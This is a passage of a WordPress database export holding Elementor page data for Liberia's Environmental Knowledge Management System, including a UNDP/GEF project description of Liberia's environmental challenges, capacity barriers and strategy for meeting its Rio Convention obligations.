and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia\\u2019s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia\\u2019s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015).\\u00a0<\\/p>\\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia.\\u00a0<\\/p>\\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions.\\u00a0<\\/p>\\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization.\\u00a0<\\/p>\\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.<\\/p>\\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:<\\/p>\\n<h4>Associated Baseline Projects<\\/h4>\\n<table style=\\\"width: 100%;\\\">\\n<tbody>\\n<tr>\\n<th><strong>Project Name<\\/strong><\\/th>\\n<th><strong>Description of project\\u2019s alignment with CCCD project<\\/strong><\\/th>\\n<\\/tr>\\n<tr>\\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)<\\/td>\\n<td>The expected results of this project included improving the rural communities\\u2019 capacities, increasing sustainable livestock and crop production, and reducing poverty.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>FAO to Support MOA Statistics and Information Management System<\\/td>\\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)<\\/td>\\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\\n<h3>B. Strategy<\\/h3>\\n<h4>B.1 Alternative Strategies<\\/h4>\\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.<\\/p>\\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project\\u2019s objective was formulated.<\\/p>\\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies \\u2013 indeed an important capacity development need that the project would help address. A related issue was the government\\u2019s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.<\\/p>\\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.<\\/p>\\n<h4>B.2 Selected Scenario<\\/h4>\\n<p>This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<p style=\\\"background-color: lightgray;\\\">The uniqueness of this project is centered on its cross-cutting nature. Other projects currently under implementation focus on strengthening targeted capacities under one of the three Rio Conventions, and thus have a relatively narrower system boundary than the CCCD programme approach. In the absence of the CCCD project, there remains likelihood that Liberia would not realize its full potential for sustainable development due to limited coordination and decentralization. Additionally, it is likely that environmental management in Liberia would continue to focus on traditionally narrow constructs.<\\/p>\\n<h4>B.3 Knowledge Management<\\/h4>\\n<p>This project is part of a portfolio of capacity building interventions in Liberia that encourages regional cooperation and knowledge and information exchanges. Partnerships and collaboration will also catalyze the transfer of knowledge and competencies among actors and stakeholders. Lessons learned from other projects will be included, as appropriate (for example, in the training programmes and the knowledge management system). This project also contains specific activities to increase the use and sharing of knowledge, and to strengthen critical thinking in understanding the implications of the global environment towards the pursuit of sustainable development. These include a series of learning-by-doing workshops and public dialogues among a diverse set of stakeholders. Component one focuses on establishing a system for collecting and sharing information and data between the institutions for better environmental management and the fulfillment of the obligations of the Rio Conventions (an EKMS).<\\/p>\\n<p>The system that the project will strengthen is the ideal platform to share lessons learned and experiences with the main stakeholders of environmental information and knowledge. Universities and research centers will be at the center of the information and knowledge management and will ensure the integration of innovative scientific and technical information into the project setup and into other baseline initiatives.<\\/p>\\n<p>The project\\u2019s approach to knowledge management is consistent with the International Resource Panel Report on Policy Coherence of the Sustainable Development Goals which emphasizes the need for developing widespread awareness and creating and disseminating decision support tools.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcde0a7\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee75b34\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"71ce863\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f710f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5403a84\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"5a46832\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9ac7a19\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9c544f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5d55e03\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the Global Environmental Facility (GEF), through the United Nations Development Programme (UNDP), for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and partner institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(25945,3830,'_elementor_edit_mode','builder'),(25946,3830,'_elementor_template_type','wp-page'),(25947,3830,'_elementor_version','2.7.5'),(25948,3830,'_wp_page_template','default'),(25949,3830,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and Partner governmental institutions as well as non-governmental organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>\\n<p>Poor governance<\\/p>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"265f48f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia\\u2019s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:<\\/p>\\n<ul>\\n<li>Weak technical, administrative and managerial capacities;<\\/li>\\n<li>Weak institutional coordination;<\\/li>\\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;<\\/li>\\n<li>Limited stakeholder participation in planning and decision-making processes;<\\/li>\\n<li>Limited dissemination of key information (Republic of Liberia, 2013).<\\/li>\\n<\\/ul>\\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).<\\/p>\\n<h4>A.3 Consistency with National Priorities<\\/h4>\\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).<\\/p>\\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size\\/number of protected areas. In Liberia\\u2019s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.<\\/p>\\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.<\\/p>\\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.<\\/p>\\n<p>The project is also in line with Liberia\\u2019s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia\\u2019s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).<\\/p>\\n<p>Liberia\\u2019s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia\\u2019s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.<\\/p>\\n<p>This project is also in line with Liberia\\u2019s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:<\\/p>\\n<ul>\\n<li>Peace, Security, Rule of Law<\\/li>\\n<li>Sustainable Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Inclusive Governance and Public Institutions<\\/li>\\n<\\/ul>\\n<p>The UNDAF (One Programme) also aligns with Liberia\\u2019s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:<\\/p>\\n<ul>\\n<li>Peace, Security and Rule of Law<\\/li>\\n<li>Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Governance and Public Institutions<\\/li>\\n<li>Cross-cutting issues<\\/li>\\n<\\/ul>\\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information\\/data.<\\/p>\\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.<\\/p>\\n<h4>A.4 Baseline Scenario and Associated Baseline Projects<\\/h4>\\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country\\u2019s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia\\u2019s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia\\u2019s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015).\\u00a0<\\/p>\\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia.\\u00a0<\\/p>\\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions.\\u00a0<\\/p>\\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization.\\u00a0<\\/p>\\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.<\\/p>\\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:<\\/p>\\n<h4>Associated Baseline Projects<\\/h4>\\n<table style=\\\"width: 100%;\\\">\\n<tbody>\\n<tr>\\n<th><strong>Project Name<\\/strong><\\/th>\\n<th><strong>Description of project\\u2019s alignment with CCCD project<\\/strong><\\/th>\\n<\\/tr>\\n<tr>\\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)<\\/td>\\n<td>The expected results of this project included improving the rural communities\\u2019 capacities, increasing sustainable livestock and crop production, and reducing poverty.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>FAO to Support MOA Statistics and Information Management System<\\/td>\\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)<\\/td>\\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\\n<h3>B. Strategy<\\/h3>\\n<h4>B.1 Alternative Strategies<\\/h4>\\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.<\\/p>\\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project\\u2019s objective was formulated.<\\/p>\\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies \\u2013 indeed an important capacity development need that the project would help address. A related issue was the government\\u2019s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.<\\/p>\\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.<\\/p>\\n<h4>B.2 Selected Scenario<\\/h4>\\n<p>This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<p style=\\\"background-color: lightgray;\\\">The uniqueness of this project is centered on its cross-cutting nature. Other projects currently under implementation focus on strengthening targeted capacities under one of the three Rio Conventions, and thus have a relatively narrower system boundary than the CCCD programme approach. In the absence of the CCCD project, there remains likelihood that Liberia would not realize its full potential for sustainable development due to limited coordination and decentralization. Additionally, it is likely that environmental management in Liberia would continue to focus on traditionally narrow constructs.<\\/p>\\n<h4>B.3 Knowledge Management<\\/h4>\\n<p>This project is part of a portfolio of capacity building interventions in Liberia that encourages regional cooperation and knowledge and information exchanges. Partnerships and collaboration will also catalyze the transfer of knowledge and competencies among actors and stakeholders. Lessons learned from other projects will be included, as appropriate (for example, in the training programmes and the knowledge management system). This project also contains specific activities to increase the use and sharing of knowledge, and to strengthen critical thinking in understanding the implications of the global environment towards the pursuit of sustainable development. These include a series of learning-by-doing workshops and public dialogues among a diverse set of stakeholders. Component one focuses on establishing a system for collecting and sharing information and data between the institutions for better environmental management and the fulfillment of the obligations of the Rio Conventions (an EKMS).<\\/p>\\n<p>The system that the project will strengthen is the ideal platform to share lessons learned and experiences with the main stakeholders of environmental information and knowledge. Universities and research centers will be at the center of the information and knowledge management and will ensure the integration of innovative scientific and technical information into the project setup and into other baseline initiatives.<\\/p>\\n<p>The project\\u2019s approach to knowledge management is consistent with the International Resource Panel Report on Policy Coherence of the Sustainable Development Goals which emphasizes the need for developing widespread awareness and creating and disseminating decision support 